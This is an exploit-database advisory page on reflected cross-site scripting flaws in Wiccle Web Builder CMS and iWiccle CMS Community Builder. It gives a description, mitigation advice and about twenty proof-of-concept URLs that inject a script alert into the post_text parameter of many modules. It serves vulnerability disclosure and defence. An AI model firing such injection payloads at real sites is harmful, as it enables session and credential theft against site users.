header-logo
Suggest Exploit
vendor:
Wiccle Web Builder CMS and iWiccle CMS Community Builder
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Wiccle Web Builder CMS and iWiccle CMS Community Builder
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple Cross-Site Scripting Vulnerabilities

Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate these vulnerabilities, ensure that user-supplied input is properly sanitized before using it in web pages or database queries. Implementing a web application firewall (WAF) can also help in detecting and blocking XSS attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/44295/info

Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://www.example.com/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>